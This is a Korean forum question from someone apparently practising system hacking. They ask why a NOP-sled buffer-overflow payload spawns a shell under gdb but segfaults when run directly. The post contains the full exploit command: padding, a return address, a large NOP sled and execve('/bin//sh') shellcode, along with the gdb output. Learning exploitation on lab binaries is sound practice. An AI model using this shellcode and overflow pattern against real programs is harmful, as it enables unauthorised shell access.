완료됨
NOP Sled 질문이 있습니다.
NOP Sled 질문
메모리 구조 : buf(36) + SFP(4) + RET(4)
exploit → buf(40) + Nop중간지점(4) + Nop(100000) + ShellCode(23)
gdb
gdb-peda$ r $(python -c 'print "A"*40 + "\x50\x0e\xff\xff" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"')
Starting program: /root/binExploit/bf_1 $(python -c 'print "A"*40 + "\x50\x0e\xff\xff" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"')
0xfffe4ac4
process 2860 is executing new program: /usr/bin/dash
#
sh
root@kali:~/binExploit# ./bf_1 $(python -c 'print "A"*40 + "\x50\x0e\xff\xff" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"')
0xffe67614
Segmentation fault
안녕하세요 실습을 진행하면서 궁금하게 있어 질문을 드립니다.
셸 환경에서 NOP Opcode 를 주고 중간 지점의 주소값 부터 시작을 하도록 설정을 한후 exploit을 하였지만 Segmentation falut 오류가 발생합니다.
혹시 어떤 문제로 인해 발생하였는지 궁금합니다.😀
#시스템해킹
